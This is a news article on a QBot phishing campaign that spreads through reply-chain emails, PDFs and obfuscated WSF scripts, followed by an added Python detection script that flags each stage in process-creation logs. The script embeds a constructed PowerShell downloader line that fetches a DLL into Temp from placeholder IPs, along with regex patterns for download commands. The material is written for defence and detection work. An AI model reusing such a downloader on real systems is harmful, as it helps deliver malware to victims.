QBot malware spreads through new phishing campaign
Proxylife and the Cryptolaemus group have detected a new phishing campaign that distributes QBot malware via PDFs and Windows Script Files (WSF). QBot, also known as QakBot, began as an information-stealing banking trojan and has grown into a dropper that gives other criminal groups a foothold for their own operations.
The phishing emails are reply-chain emails: the attackers reply to an existing email thread with a malicious link or attachment, so the message arrives with legitimate-looking context. The emails are written in a variety of languages, so organizations anywhere in the world may be targeted. When a recipient opens the PDF, it displays the warning “This document contains protected files, to display them, click on the ‘open’ button.” Clicking the button downloads a ZIP file containing the WSF script.
The script used in this campaign is heavily obfuscated and mixes JavaScript (JS) and VBScript. When run, it launches a PowerShell script that tries a list of URLs in turn until one returns the QBot DLL, which it saves to the Windows Temp folder and executes. Once launched, QBot injects itself into wermgr.exe, the Windows Error Reporting Manager, a legitimate Windows component, so that it can run in the background without attracting attention.
Kaspersky also analyzed the campaign and found that it uses reply-chain emails to make the messages harder for targets to recognize as malicious. The emails are written in the style of legitimate business correspondence obtained by the attackers and urge the recipient to open a PDF attachment. The PDF carries several layers of obfuscation, which make it harder for security products to flag as malicious.
The PDF leads to a Windows Script File (WSF) containing a hidden PowerShell script stored as a single Base64-encoded line. When the PowerShell script runs, it uses wget (in PowerShell, an alias for Invoke-WebRequest) to download a DLL from a remote server; that DLL is then executed to install QBot on the victim’s PC.
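As an added example covering the chain described in the last four paragraphs (WSF run by a script host, PowerShell with a Base64-encoded command that fetches a DLL into Temp, QBot living inside wermgr.exe), the Python below decodes a PowerShell -EncodedCommand payload and runs one heuristic per stage over Sysmon-style process-creation events. This is illustrative detection logic written for this page, not code from Proxylife, Cryptolaemus, Kaspersky, Tanium or Malwarebytes. The JSON-lines log format and field names, the list of parents expected to start wermgr.exe, the rundll32.exe loader parent in the sample, the documentation-range IPs and every sample event are constructed assumptions.

```python
"""Stage heuristics for the WSF -> PowerShell -> DLL -> wermgr.exe chain.
Added example for this page; log format, field names and events are constructed."""
import base64
import json
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Parents that legitimately start wermgr.exe (assumption for this example).
EXPECTED_WERMGR_PARENTS = {"svchost.exe", "wermgr.exe", "werfault.exe"}
DOWNLOAD_VERBS = re.compile(
    r"\b(wget|iwr|curl|invoke-webrequest|downloadfile|downloadstring)\b", re.I)
TEMP_DLL = re.compile(r"temp\\[^\s\"';]+\.dll", re.I)
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script):
    """Encode a script the way -EncodedCommand expects: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none
    or it is not valid Base64 / UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze_events(events):
    """Apply one heuristic per stage of the chain; return (rule, pid) pairs."""
    findings = []
    for ev in events:
        image = _basename(ev["Image"])
        parent = _basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        pid = ev["ProcessId"]
        # Stage 1: a script host running the .wsf dropped from the ZIP.
        if image in SCRIPT_HOSTS and ".wsf" in cmd.lower():
            findings.append(("wsf_script_host", pid))
        if image == "powershell.exe":
            # Stage 2a: PowerShell launched by the script host itself.
            if parent in SCRIPT_HOSTS:
                findings.append(("powershell_from_script_host", pid))
            # Stage 2b: decode -enc (if present) and look for a DLL fetched into Temp.
            text = decode_encoded_command(cmd) or cmd
            if DOWNLOAD_VERBS.search(text) and TEMP_DLL.search(text):
                findings.append(("powershell_dll_download_to_temp", pid))
        # Stage 3: wermgr.exe started by something other than the WER service
        # (assumed here to be the injection host being prepared).
        if image == "wermgr.exe" and parent not in EXPECTED_WERMGR_PARENTS:
            findings.append(("wermgr_unusual_parent", pid))
    return findings


def analyze_log(text):
    """Parse JSON-lines process-creation events and analyze them."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    return analyze_events(events)


# Constructed downloader mimicking the described behaviour: try each URL in
# turn and stop at the first DLL that lands in Temp. Hosts are documentation IPs.
SAMPLE_DOWNLOADER = (
    "$u='http://203.0.113.5/a.dat','http://198.51.100.7/b.dat';"
    "foreach($a in $u){try{wget $a -OutFile $env:TEMP\\load.dll;break}catch{}}"
)

SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"ProcessId": 4100, "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "wscript.exe C:\\Users\\alice\\Downloads\\doc.wsf"},
    {"ProcessId": 4112,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_powershell(SAMPLE_DOWNLOADER)},
    # Assumed loader parent; the page does not name what runs the DLL.
    {"ProcessId": 4130, "Image": "C:\\Windows\\System32\\wermgr.exe",
     "ParentImage": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "wermgr.exe"},
    # Benign: the WER service starting wermgr.exe for an upload.
    {"ProcessId": 4150, "Image": "C:\\Windows\\System32\\wermgr.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "C:\\Windows\\system32\\wermgr.exe -upload"},
])

if __name__ == "__main__":
    for rule, pid in analyze_log(SAMPLE_LOG):
        print(f"{rule:35} pid={pid}")
```

Each stage fires on its own event, which is the point Morris makes below about chaining: no single event looks conclusive, so the detections should be correlated by process tree (parent to child) within a short window rather than judged in isolation. Decoding the -EncodedCommand before matching matters because the download verb and the Temp path are invisible in the raw command line.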
QBot’s many layers of obfuscation make it difficult to detect. The WSF, which will download further payloads, is obfuscated to evade detection, explains Timothy Morris, chief security adviser at Tanium. Attack ‘chaining,’ or using multiple steps, helps get past some protections since the full context of the nefarious behavior can’t be observed as a single activity.
The sources for this piece include an article in Malwarebytes.